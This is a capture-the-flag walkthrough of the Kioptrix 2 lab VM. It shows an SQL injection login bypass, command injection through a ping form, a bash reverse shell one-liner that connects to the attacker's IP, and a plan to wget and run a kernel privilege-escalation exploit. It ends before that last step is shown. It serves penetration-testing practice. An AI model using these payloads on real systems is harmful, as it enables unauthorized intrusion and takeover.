Kioptrix 2 should be a bit harder than kioptrix 1. I came into this expecting this to be a little harder then it turned out. After downloading and setting up the VM I jumped right in. Starting off with a quick nmap of the network to find the VM.
We can see that port 80 and 443 are on for http and https. On top of this we have:
Personally I prefer to start things off by having a look at any websites. A lot can be learned by browsing through a website (including ways to gain access).
Index.php is an admin login. Cool! From the earlier scans we know that mysql is running. So I try some sql injections.
‘ – nothing
‘ OR 1=1 – nothing
‘ OR ‘1’=’1 – BINGO!
I’ve logged into the site. The SQL statement must have ended with something along the lines of:
… username = ‘ ‘ password = ‘ ‘
With the injection making it look like:
… username = ‘ ‘ password = ‘’ OR ‘1’=’1‘
This “OR ‘1’=’1’ makes this SQL statement true, which allows me access into the website.
The next page that we are presented with is a ping test page…. Cool we get to send command line through the webpage. This will be easy. First off to try this I ping the Kali VM
And it works. Time to try something else:
This works! Next thing to try is a reverse shell. There are many ways to get a reverse shell. Thankfully in this day and age there are webpages that offer examples of this and much more.
pentestmonkey- provides a great list for reverse shell “one-liners”. These can be delivered multiple ways. In this example I simply place the code after the ip address and semicolon:
127.0.0.1; bash -i >& /dev/tcp/192.168.0.102/8080 0>&1
At the same time, I have a command prompt open listening for the reverse shell. Once listening I click on submit.
Now that I’m in its time to check kernel version and OS release. This gives me:
Linux version 2.6.9-55EL (email@example.com) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
CentosOS release 4.5 (Final)
Searching searchsploit and the internet I find an exploit that will escalate privilege to root. (https://www.exploit-db.com/exploits/9542/).
To get this over to the VM I need to first make the exploit available to be grabbed from the VM. So I start apache and move the exploit to /var/www. Once done I wget it from the reverse shell and execute it: